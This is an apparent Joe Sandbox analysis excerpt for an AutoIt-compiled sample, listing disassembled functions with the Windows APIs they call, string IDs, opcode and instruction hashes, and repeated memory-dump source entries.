                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_wcslen
                                                                          • String ID: |
                                                                          • API String ID: 596671847-2343686810
                                                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                          Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                          Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_sprintf_strlen
                                                                          • String ID: %02X
                                                                          • API String ID: 1921645428-436463671
                                                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                          Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                          Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                          Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                          Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: htonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 3832099526-2422070025
                                                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                          Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: InternetOpen
                                                                          • String ID: <local>
                                                                          • API String ID: 2038078732-4266983199
                                                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                          Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                          Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: u,D
                                                                          • API String ID: 4104443479-3858472334
                                                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                          Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_mallocwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 1262938277-328681919
                                                                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                          Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                          • String ID: aeB
                                                                          • API String ID: 857135153-906807131
                                                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                          Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                          Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                          Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D